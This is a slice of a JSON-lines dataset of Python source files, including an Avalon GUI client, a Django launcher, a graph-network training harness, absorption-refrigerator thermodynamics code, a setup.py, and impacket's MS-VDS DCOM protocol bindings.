space-separated variables\")\n return\n message = message + input_data\n\n elif random_use.get() == 1:\n input_data = _generate_random_data()\n if input_data is None or len(input_data) == 0:\n messagebox.showwarning(\n \"Error\", \"Random variable generation error\")\n return\n message = message + input_data\n else:\n for var in var_list:\n if var.get() is None:\n messagebox.showwarning(\"Error\", \"Must input all variables\")\n return\n message = message + str(var.get()) + \" \"\n root.wait_window(resultWindow(root, message))\n\n def aggregate():\n \"\"\"Open window that will submit work order to retrieve\n an aggregate result.\n \"\"\"\n\n message = \"Heart disease aggregate data: \"\n root.wait_window(resultWindow(root, message))\n\n # \"Evaluate\" button\n eval_text = tk.StringVar()\n eval_label = tk.Label(root, textvariable=eval_text,\n background=BACKGROUND)\n eval_label.pack()\n eval_button = tk.Button(root, text=\"Evaluate\", command=evaluate,\n background=BUTTON_COLOR)\n eval_button.pack()\n\n # \"Aggregate\" button\n aggr_text = tk.StringVar()\n aggr_label = tk.Label(root, textvariable=aggr_text, background=BACKGROUND)\n aggr_label.pack()\n aggr_button = tk.Button(root, text=\"Aggregate all data\",\n command=aggregate, background=BUTTON_COLOR)\n aggr_button.pack(pady=(0, 10))\n\n root.mainloop()\n\n\ndef parse_command_line(args):\n \"\"\"Setup and parse command line arguments and help information.\"\"\"\n\n global worker_obj\n global worker_id\n global verbose\n global config\n global off_chain\n global requester_signature\n\n parser = argparse.ArgumentParser()\n use_service = parser.add_mutually_exclusive_group()\n parser.add_argument(\n \"-c\", \"--config\",\n help=\"the config file containing the\" +\n \" Ethereum contract information\", type=str)\n use_service.add_argument(\n \"-r\", \"--registry-list\",\n help=\"the Ethereum address of the registry list\",\n type=str)\n use_service.add_argument(\n \"-s\", \"--service-uri\",\n help=\"skip URI lookup and send to specified URI\",\n type=str)\n use_service.add_argument(\n \"-o\", \"--off-chain\",\n help=\"skip URI lookup and use the registry in the config file\",\n action=\"store_true\")\n parser.add_argument(\n \"-w\", \"--worker-id\",\n help=\"skip worker lookup and retrieve specified worker\",\n type=str)\n parser.add_argument(\n \"-v\", \"--verbose\",\n help=\"increase output verbosity\",\n action=\"store_true\")\n parser.add_argument(\n \"-rs\", \"--requester_signature\",\n help=\"Enable requester signature for work order requests\",\n action=\"store_true\")\n\n options = parser.parse_args(args)\n\n if options.config:\n conf_files = [options.config]\n else:\n conf_files = [TCFHOME +\n \"/sdk/avalon_sdk/tcf_connector.toml\"]\n conf_paths = [\".\"]\n\n try:\n config = pconfig.parse_configuration_files(conf_files, conf_paths)\n json.dumps(config, indent=4)\n except pconfig.ConfigurationException as e:\n logger.error(str(e))\n sys.exit(-1)\n\n global direct_jrpc\n direct_jrpc = AvalonDirectClient(conf_files[0])\n\n # Whether or not to connect to the registry list on the blockchain\n off_chain = False\n\n if options.registry_list:\n config[\"ethereum\"][\"direct_registry_contract_address\"] = \\\n options.registry_list\n\n if options.service_uri:\n service_uri = options.service_uri\n off_chain = True\n\n if options.off_chain:\n service_uri = config[\"tcf\"].get(\"json_rpc_uri\")\n off_chain = True\n\n requester_signature = options.requester_signature\n\n verbose = options.verbose\n worker_id = options.worker_id\n\n # 
Initializing Worker Object\n worker_obj = worker.SGXWorkerDetails()\n\n\ndef initialize_logging(config):\n \"\"\"Initialize logging.\"\"\"\n\n if verbose:\n config[\"Logging\"] = {\n \"LogFile\": \"__screen__\",\n \"LogLevel\": \"INFO\"\n }\n else:\n config[\"Logging\"] = {\n \"LogFile\": \"__screen__\",\n \"LogLevel\": \"WARN\"\n }\n plogger.setup_loggers(config.get(\"Logging\", {}))\n sys.stdout = plogger.stream_to_logger(\n logging.getLogger(\"STDOUT\"), logging.DEBUG)\n sys.stderr = plogger.stream_to_logger(\n logging.getLogger(\"STDERR\"), logging.WARN)\n\n\ndef initialize_tcf(config):\n \"\"\"Initialize Avalon: get Avalon worker instance.\"\"\"\n\n logger.info(\"***************** Avalon *****************\")\n\n # Retrieve Worker Registry\n if not off_chain:\n registry_list_instance = direct_jrpc. \\\n get_worker_registry_list_instance()\n registry_count, lookup_tag, registry_list = \\\n registry_list_instance.registry_lookup()\n logger.info(\"\\n Registry lookup response : registry count {}\\\n lookup tag {} registry list {}\\n\".format(\n registry_count, lookup_tag, registry_list\n ))\n if (registry_count == 0):\n logger.warn(\"No registries found\")\n sys.exit(1)\n registry_retrieve_result = \\\n registry_list_instance.registry_retrieve(\n registry_list[0])\n logger.info(\"\\n Registry retrieve response : {}\\n\".format(\n registry_retrieve_result\n ))\n config[\"tcf\"][\"json_rpc_uri\"] = registry_retrieve_result[0]\n\n # Prepare worker\n\n global worker_id\n if not worker_id:\n worker_registry_instance = direct_jrpc.get_worker_registry_instance()\n req_id = 31\n worker_lookup_result = worker_registry_instance.worker_lookup(\n worker_type=WorkerType.TEE_SGX,\n id=req_id\n )\n logger.info(\"\\n Worker lookup response : {} \\n\".format(\n json.dumps(worker_lookup_result, indent=4)\n ))\n if \"result\" in worker_lookup_result and \\\n \"ids\" in worker_lookup_result[\"result\"].keys():\n if worker_lookup_result[\"result\"][\"totalCount\"] != 0:\n worker_id = \\\n worker_lookup_result[\"result\"][\"ids\"][0]\n else:\n logger.error(\"ERROR: No workers found\")\n sys.exit(1)\n else:\n logger.error(\"ERROR: Failed to lookup worker\")\n sys.exit(1)\n req_id += 1\n worker = worker_registry_instance.worker_retrieve(\n worker_id,\n req_id\n )\n logger.info(\"\\n Worker retrieve response : {}\\n\".format(\n json.dumps(worker, indent=4)\n ))\n worker_obj.load_worker(\n worker\n )\n logger.info(\"**********Worker details Updated with Worker ID\" +\n \"*********\\n%s\\n\", worker_id)\n\n\ndef main(args=None):\n \"\"\"Entry point function.\"\"\"\n\n parse_command_line(args)\n\n initialize_logging(config)\n\n initialize_tcf(config)\n\n # Open GUI\n gui_main()\n\n\n# -----------------------------------------------------------------------------\nmain()\n"} {"ext": "py", "sha": "1a307088777aa0e35f95b844b6e96a4fe7c6fc1e", "content": "#!/usr/bin/env python\n# Copyright 2016 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\nimport sys\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"myoauth.settings\")\n\n from django.core.management import execute_from_command_line\n\n execute_from_command_line(sys.argv)\n"} {"ext": "py", "sha": "1a30713242f679d0cf9a3f0fa4790f66a85e40ac", "content": "import numpy as np\nimport collections\nimport numbers\nimport torch\nimport os\nfrom . import joint_network\nfrom .summary import LamanClassificationSummary\nfrom .. import corruption_dataset, model as mo\nfrom .representation import graph_to_rep, combine_graph_reps, encode_action, LamanRep, get_action_offsets\nfrom ..molecule_models import _train_utils, _train_harness\nfrom ._utils import cast_numpy_rec\n\n\ndef _transform(graph, act):\n graph_rep = graph_to_rep(graph)\n act_encoded = encode_action(act, graph)\n act_coarse = act.action_type\n offset = torch.from_numpy(get_action_offsets(graph)).int()\n\n return {\n 'graph': graph_rep,\n 'label': act_encoded,\n 'label_coarse': act_coarse,\n 'label_offset': offset\n }\n\n\ndef _collate(batch):\n graph = combine_graph_reps([b['graph'] for b in batch])\n graph = cast_numpy_rec(graph)\n label_fine = torch.LongTensor([b['label'] for b in batch])\n label_coarse = torch.LongTensor([b['label_coarse'] for b in batch])\n offsets = torch.stack([b['label_offset'] for b in batch])\n\n return {'graph': graph, 'label': label_fine, 'label_coarse': label_coarse, 'label_offset': offsets}\n\n\ndef make_dataloader(dataset, batch_size=128, num_workers=2):\n return torch.utils.data.DataLoader(\n dataset, batch_size, shuffle=True, collate_fn=_collate,\n pin_memory=True, num_workers=num_workers)\n\n\nclass LamanJointHarness(_train_harness.TrainingHarness):\n _keys = ['label', 'label_offset']\n\n def __init__(self, model, optimizer, summary, task='train', profile=False):\n super(LamanJointHarness, self).__init__(model, optimizer, summary, task=task, profile=profile)\n\n def get_model_input(self, batch):\n graph = LamanRep.from_sequence(batch['graph'])\n return graph,\n\n def get_loss(self, model_output, batch):\n loss, summary_info = mo.classification.multi_classification_coarse_to_fine_loss(\n model_output, batch['label_coarse'], batch['label'], summary_info=True)\n\n self.summary.record_marginal_probability(\n torch.nn.functional.softmax(summary_info['coarse_logit'].detach(), dim=1).mean(dim=0))\n\n return loss\n\n def record_step_summary(self, batch, model_output):\n logits_and_scopes = model_output\n prediction, label, label_offset = _train_harness.compute_and_aggregate_predictions(\n logits_and_scopes, batch, self._keys)\n\n if self.summary:\n self.summary.record_statistics(prediction, label, label_offset)\n\n\ndef main(parameters=None):\n if parameters is None:\n parameters = {}\n\n task = parameters.get('task', 'train')\n batch_size = parameters.get('batch_size', 256)\n\n dataset_path = parameters.get('dataset_path')\n if dataset_path is None:\n dataset_path = 
'../data/laman/low_decomp_dataset_sample.pkl'\n\n dataset = corruption_dataset.LamanCorruptionDataset(dataset_path, transform=_transform)\n\n dataloader = make_dataloader(dataset, batch_size, num_workers=parameters.get('num_workers', 2))\n\n config = joint_network.JointClassificationNetworkConfig(\n 5, message_size=256)\n model = joint_network.JointClassificationNetwork(config)\n\n if 'model_path' in parameters and parameters['model_path'] is not None:\n model.load_state_dict(torch.load(parameters['model_path'], map_location='cpu'))\n\n model = model.cuda()\n\n if task != 'train':\n model = model.eval()\n\n if task == 'train':\n optimizer, schedulers = _train_utils.init_optimizer(model, parameters)\n else:\n optimizer = None\n schedulers = []\n\n summary = LamanClassificationSummary()\n\n harness = LamanJointHarness(model, optimizer, summary, task)\n harness.hooks.extend([\n _train_harness.LogLossTimeHook(batch_size),\n _train_harness.PrintAccuracyHook(summary, None)\n ])\n\n savedir = _train_utils.get_save_dir(parameters)\n\n for epoch in range(30):\n dataset.set_epoch(epoch)\n harness.set_epoch(epoch)\n\n if task == 'train':\n for scheduler in schedulers:\n scheduler.step()\n\n harness.train_epoch(dataloader)\n\n if task == 'train':\n torch.save(\n model.state_dict(),\n os.path.join(savedir, 'laman_joint_ep_{0}.pth'.format(epoch)))\n\n\nif __name__ == '__main__':\n args = _train_utils.parse_arguments()\n main(vars(args))\n"} {"ext": "py", "sha": "1a30713db64a02d79f6d119907494d1b00e0c519", "content": "from celery import Celery\n\n\ndef make_celery(app):\n celery = Celery(\n app.import_name,\n broker=app.config.get('CELERY_BROKER_URL', 'redis://localhost:6379')\n )\n celery.conf.update(app.config)\n TaskBase = celery.Task\n\n class ContextTask(TaskBase):\n abstract = True\n\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return TaskBase.__call__(self, *args, **kwargs)\n\n celery.Task = ContextTask\n return celery\n"} {"ext": "py", "sha": "1a3071793dfa4b9b377970acbccf3fd7b1f75ffd", "content": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sympy import solve, Eq, symbols\nimport sys \nimport pandas\nimport math\nimport os\n\ndef degradeCOP(Tevap, Tcond, Qall, S):\n degraded = ((Tevap * Tcond)/(Tcond - Tevap)) * (S/Qall)\n return degraded\n\n# This function calculates the reversible COP of a ES refrigerator based on thermal reservoirs\ndef reversibleCOP(Tevap, Tcond, Tgen):\n revCOP = (((Tgen - Tcond)/(Tgen))/((Tcond-Tevap)/Tevap))\n return revCOP\n\n# This function solves the system of equations to calculate the mass flowrates of\n# the combined absorber-evaporator system\ndef massabsorberevaporator(m6, m4, xa4, ya3, xa6):\n m3, m5= symbols(['m3', 'm5'])\n system = [\n #Eq((xa4*m4)+ (ya3 * m3) - (0 * m5) - (xa6 * m6), 0),\n Eq(m5 - (1-ya3)*m3,0),\n Eq(m4 + m3 - m5 - m6, 0),\n #Eq((1-ya3)*m3-m5, 0)\n #Eq(m4 - (ya3*m3) - (m5) + (ya3 * m6), 0)\n ]\n soln = solve(system, [m4, m3, m5, m6])\n\n return float(m4), float(soln[m3]), float(soln[m5]), float(m6)\n\n# This is an interpolate helper function to be used in other functions.\n# targetcomp refers to ammonia composition. 
All CSV files are in ammonia composition.\ndef interpolateAW(targetcomp, T, var):\n # must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv\n\n script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\n rel_path = 'data/mixed/'\n abs_file_path = os.path.join(script_dir, rel_path)\n\n colnames = ['pressure', 'ammoniacomp', 'prop']\n propertyname = ''\n if var is 1:\n propertyname = 'enthalpy'\n else:\n propertyname = 'entropy'\n\n filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniawater'\n\n data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames)\n\n ammoniacomp = data.ammoniacomp.tolist()\n prop = data.prop.tolist()\n\n lower = prop[int(math.floor(targetcomp /0.05))]\n higher = prop[(int((math.floor(targetcomp /0.05))+1))]\n\n theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 )\n return (theta * higher) + (1-theta)*lower\n\ndef interpolateAB(targetcomp, T, var):\n # must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv\n\n script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\n rel_path = 'data/mixed/'\n abs_file_path = os.path.join(script_dir, rel_path)\n\n colnames = ['pressure', 'ammoniacomp', 'prop']\n propertyname = ''\n if var is 1:\n propertyname = 'enthalpy'\n else:\n propertyname = 'entropy'\n\n filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniabutane'\n\n data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames)\n\n ammoniacomp = data.ammoniacomp.tolist()\n prop = data.prop.tolist()\n\n lower = prop[int(math.floor(targetcomp /0.05))]\n higher = prop[(int((math.floor(targetcomp /0.05))+1))]\n\n theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 )\n return (theta * higher) + (1-theta)*lower\n# This calculates the two mass flowrates and the compositions coming out of the flash drum \n# given a mass flowrate and composition of ammonia coming in\n# inputcomp is the ammonia composition\n# temp is the temperature that the flash drum flashes at\ndef leverrule(inputflow, temp, inputcomp):\n #t-xy of ammonia-water\n #input composition of ammonia\n script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\n rel_path = \"data/txy/\"\n abs_file_path = os.path.join(script_dir, rel_path)\n colnames = ['pressure', 'ammoniacomp', 'temperature', 'vaporwater', 'vaporammonia', 'liquidwater', 'liquidammonia']\n filename = 'txy-ammonia-4bar'\n data = pandas.read_csv( str(abs_file_path) + '%s.csv' %filename, names = colnames)\n\n ammoniacomp = data.ammoniacomp.tolist()\n temperature = data.temperature.tolist()\n vaporammonia = data.vaporammonia.tolist()\n liquidammonia = data.liquidammonia.tolist()\n\n\n index, valuetemp = min(enumerate(temperature), key=lambda x: abs(x[1]-temp))\n\n liquiddistance = inputcomp - liquidammonia[index]\n vapordistance = vaporammonia[index] - inputcomp\n\n vaporflow = symbols('vaporflow')\n system = [\n Eq((vapordistance * vaporflow) + (-1.0*liquiddistance*(float(inputflow) - vaporflow)), 0)\n ]\n \n soln = solve(system, [vaporflow])\n\n # the order is: vapor flow, liquid flow, liquid ammonia composition. 
vapor ammonia composition\n return soln[vaporflow], (inputflow - soln[vaporflow]) ,liquidammonia[index], vaporammonia[index]\n\n# This calculates the Q of the generator\n# compin is the ammonia composition\ndef Qgenerator(massin, compin, Tgen):\n massout = massin\n\n enthalpyin = interpolateAW(compin, 325, 1 )\n\n enthalpyout = interpolateAW(compin, Tgen, 1)\n\n Qgen = -1*(massin*enthalpyin - massout*enthalpyout)\n\n return Qgen\n# This calculates the S of the flash\n# compin is the ammonia flash\ndef Sgenerator(massin, compin, Qgen, Tgen):\n massout = massin\n\n entropyin = interpolateAW(compin, 325, 2)\n #RAHUL fixed Line 95 - wrong entropy values read in\n entropyout = interpolateAW(compin, Tgen, 2)\n\n Sgen = symbols('Sgen')\n system = Eq((-1 * massin * entropyin ) + (massout*entropyout) + (Qgen/Tgen) - Sgen, 0)\n\n soln = solve([system], Sgen)\n\n return soln[Sgen]\n\ndef Qflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Tgen):\n\n enthalpyin = interpolateAW( compin, Tgen, 1)\n\n enthalpyoutvapor = interpolateAW(vaporammonia, Tgen, 1)\n\n enthalpyoutliquid = interpolateAW( liquidammonia, Tgen, 1)\n\n Qflash = symbols('Qflash')\n system = Eq(( massin* enthalpyin ) + (-1* massvapor*enthalpyoutvapor) + (-1* massliquid*enthalpyoutliquid) + Qflash, 0)\n\n \n soln = solve([system], [Qflash])\n\n return soln[Qflash]\n# This calculates the S of the flash\n# compin is the ammonia flash\ndef Sflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Qflash, Tgen):\n\n entropyin = interpolateAW( compin, Tgen, 2)\n\n entropyoutvapor = interpolateAW(vaporammonia, Tgen, 2)\n\n entropyoutliquid = interpolateAW(liquidammonia, Tgen, 2)\n\n Sflash = symbols('Sflash')\n system = Eq(( massin* entropyin ) + (-1* massvapor*entropyoutvapor) + (-1* massliquid*entropyoutliquid) + (Sflash/Tgen) - Qflash, 0)\n\n \n soln = solve([system], Sflash)\n\n return soln[Sflash]\ndef Qevaporator(m2, m3, m5, ya3, ya2, xa5, Tgen):\n\n enthalpym2 = interpolateAW(ya2, Tgen, 1)\n\n enthalpym3 = interpolateAB( ya3, 266, 1)\n #print(enthalpym3)\n enthalpym5 = interpolateAB( xa5, 325, 1)\n #print(enthalpym5)\n\n\n # print(enthalpym2 + enthalpym3 + enthalpym5)\n Qevap = symbols('Qevap')\n system = Eq(( m2 * enthalpym2 ) + (-1* m3*enthalpym3) + (m5*enthalpym5) + Qevap, 0)\n soln = solve([system], Qevap)\n\n #print(type(soln))\n return soln[Qevap]\n\ndef Sevaporator(m2, m3, m5, ya3, ya2, xa5, Qevap, Tgen):\n\n entropym2 = interpolateAW(ya2, Tgen, 2)\n\n entropym3 = interpolateAB( ya3, 266, 2)\n\n entropym5 = interpolateAB( xa5, 325, 2)\n\n Sevap = symbols('Sevap')\n system = Eq(( m2 * entropym2 ) + (-1* m3*entropym3) + (m5*entropym5) + (Qevap/266) - Sevap, 0)\n \n\n soln = solve([system], Sevap)\n\n return soln[Sevap]\n\ndef Qabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Tgen):\n\n enthalpym3 = interpolateAB( ya3, 266, 1)\n \n enthalpym4 = interpolateAW( xa4, Tgen, 1)\n \n enthalpym5 = interpolateAB(xa5, 325, 1)\n \n enthalpym6 = interpolateAW( xa6, 325, 1)\n \n Qabs = symbols('Qabs')\n system = (m3 * enthalpym3 ) + (m4 * enthalpym4) + (-1*m5 * enthalpym5) + (-1 * m6 * enthalpym6) + Qabs\n \n\n soln = solve([system], Qabs)\n\n return soln[Qabs]\n\n\ndef Sabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Qabs, Tgen):\n\n entropym3 = interpolateAB( ya3, 266, 2)\n\n entropym4 = interpolateAW( xa4, Tgen, 2)\n\n entropym5 = interpolateAB( xa5, 325, 2)\n\n entropym6 = interpolateAW(xa6, 325, 2)\n\n Sabs = symbols('Sabs')\n system = Eq((m3*entropym3) + (m4 * entropym4) + (-1*m5 * entropym5) + 
(-1*m6*entropym6) + (Qabs/325)- Sabs, 0)\n \n\n soln = solve([system], Sabs)\n\n return soln[Sabs]"} {"ext": "py", "sha": "1a307224ae5f0e70ae470da0a1bec456b3c60633", "content": "from setuptools import setup, find_packages\nimport versioneer\n\nsetup(\n name=\"pylammpsmpi\",\n version=versioneer.get_version(),\n description=\"Parallel Lammps Python interface\",\n url='https://github.com/pyiron/pylammpsmpi',\n author='Jan Janssen',\n author_email='janssen@mpie.de',\n license='BSD',\n\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Topic :: Scientific/Engineering :: Physics',\n 'License :: OSI Approved :: BSD License',\n 'Intended Audience :: Science/Research',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9'\n ],\n\n keywords='lammps, mpi4py',\n packages=find_packages(exclude=[\"*tests*\"]),\n install_requires=[\n 'mpi4py==3.1.3'\n ],\n cmdclass=versioneer.get_cmdclass(),\n)\n"} {"ext": "py", "sha": "1a307417545ff9bfda87edae6e82843be95b41e9", "content": "# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.\n#\n# This software is provided under under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Author: Alberto Solino (@agsolino)\n#\n# Description:\n# [MS-VDS]: Virtual Disk Service (VDS) Protocol\n# This was used as a way to test the DCOM runtime. Further \n# testing is needed to verify it is working as expected\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC\n#\n# Since DCOM is like an OO RPC, instead of helper functions you will see the \n# classes described in the standards developed. \n# There are test cases for them too. 
\n#\n\n\nfrom impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM\nfrom impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE\nfrom impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket import hresult_errors\nfrom impacket.uuid import string_to_bin\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n if self.error_code in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] \n return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code)\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 1.9 Standards Assignments\nCLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575')\nIID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E')\nIID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25')\nIID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC')\nIID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69')\nIID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E')\nIID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8')\nIID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42')\n\nerror_status_t = ULONG\n\n# 2.2.1.1.3 VDS_OBJECT_ID\nVDS_OBJECT_ID = GUID\n\n################################################################################\n# STRUCTURES\n################################################################################\n# 2.2.2.1.3.1 VDS_SERVICE_PROP\nclass VDS_SERVICE_PROP(NDRSTRUCT):\n structure = (\n ('pwszVersion',LPWSTR),\n ('ulFlags',ULONG),\n )\n\nclass OBJECT_ARRAY(NDRUniConformantVaryingArray):\n item = PMInterfacePointer\n\n# 2.2.2.7.1.1 VDS_PROVIDER_TYPE\nclass VDS_PROVIDER_TYPE(NDRENUM):\n class enumItems(Enum):\n VDS_PT_UNKNOWN = 0\n VDS_PT_SOFTWARE = 1\n VDS_PT_HARDWARE = 2\n VDS_PT_VIRTUALDISK = 3\n VDS_PT_MAX = 4\n\n# 2.2.2.7.2.1 VDS_PROVIDER_PROP\nclass VDS_PROVIDER_PROP(NDRSTRUCT):\n structure = (\n ('id',VDS_OBJECT_ID),\n ('pwszName',LPWSTR),\n ('guidVersionId',GUID),\n ('pwszVersion',LPWSTR),\n ('type',VDS_PROVIDER_TYPE),\n ('ulFlags',ULONG),\n ('ulStripeSizeFlags',ULONG),\n ('sRebuildPriority',SHORT),\n )\n\n################################################################################\n# RPC CALLS\n################################################################################\n\n# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3)\nclass IVdsServiceInitialization_Initialize(DCOMCALL):\n opnum = 3\n structure = (\n ('pwszMachineName', LPWSTR),\n )\n\nclass IVdsServiceInitialization_InitializeResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3)\nclass IVdsService_IsServiceReady(DCOMCALL):\n opnum = 3\n structure = (\n )\n\nclass IVdsService_IsServiceReadyResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', 
error_status_t),\n )\n\n# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4)\nclass IVdsService_WaitForServiceReady(DCOMCALL):\n opnum = 4\n structure = (\n )\n\nclass IVdsService_WaitForServiceReadyResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5)\nclass IVdsService_GetProperties(DCOMCALL):\n opnum = 5\n structure = (\n )\n\nclass IVdsService_GetPropertiesResponse(DCOMANSWER):\n structure = (\n ('pServiceProp', VDS_SERVICE_PROP),\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6)\nclass IVdsService_QueryProviders(DCOMCALL):\n opnum = 6\n structure = (\n ('masks', DWORD),\n )\n\nclass IVdsService_QueryProvidersResponse(DCOMANSWER):\n structure = (\n ('ppEnum', PMInterfacePointer),\n ('ErrorCode', error_status_t),\n )\n\n# 3.1.1.1 IEnumVdsObject Interface\n# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3)\nclass IEnumVdsObject_Next(DCOMCALL):\n opnum = 3\n structure = (\n ('celt', ULONG),\n )\n\nclass IEnumVdsObject_NextResponse(DCOMANSWER):\n structure = (\n ('ppObjectArray', OBJECT_ARRAY),\n ('pcFetched', ULONG),\n ('ErrorCode', error_status_t),\n )\n# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3)\nclass IVdsProvider_GetProperties(DCOMCALL):\n opnum = 3\n structure = (\n )\n\nclass IVdsProvider_GetPropertiesResponse(DCOMANSWER):\n structure = (\n ('pProviderProp', VDS_PROVIDER_PROP),\n ('ErrorCode', error_status_t),\n )\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = {\n}\n\n################################################################################\n# HELPER FUNCTIONS AND INTERFACES\n################################################################################\nclass IEnumVdsObject(IRemUnknown2):\n def Next(self, celt=0xffff):\n request = IEnumVdsObject_Next()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['celt'] = celt\n try:\n resp = self.request(request, uuid = self.get_iPid())\n except Exception as e:\n resp = e.get_packet()\n # If it is S_FALSE(1) means less items were returned\n if resp['ErrorCode'] != 1:\n raise\n interfaces = list()\n for interface in resp['ppObjectArray']:\n interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target())))\n return interfaces\n\nclass IVdsProvider(IRemUnknown2):\n def GetProperties(self):\n request = IVdsProvider_GetProperties()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\nclass IVdsServiceInitialization(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n\n def Initialize(self):\n request = IVdsServiceInitialization_Initialize()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['pwszMachineName'] = '\\x00'\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\nclass IVdsService(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n\n def IsServiceReady(self):\n request = IVdsService_IsServiceReady()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n try:\n resp = self.request(request, uuid = 
self.get_iPid())\n except Exception as e:\n resp = e.get_packet()\n return resp \n\n def WaitForServiceReady(self):\n request = IVdsService_WaitForServiceReady()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\n def GetProperties(self):\n request = IVdsService_GetProperties()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\n def QueryProviders(self, masks):\n request = IVdsService_QueryProviders()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['masks'] = masks\n resp = self.request(request, uuid = self.get_iPid())\n return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n"} {"ext": "py", "sha": "1a3075bea55ac79dc5e8c5c5bceb0b7c00b64e21", "content": "\"\"\"\nThis module contains a dynamic programming algorithm for solving the subset sum\nproblem. See section 6.4 of Algorithm Design by Kleinberg and Tardos.\n\nAn instance of the subset sum problem is defined by a weight 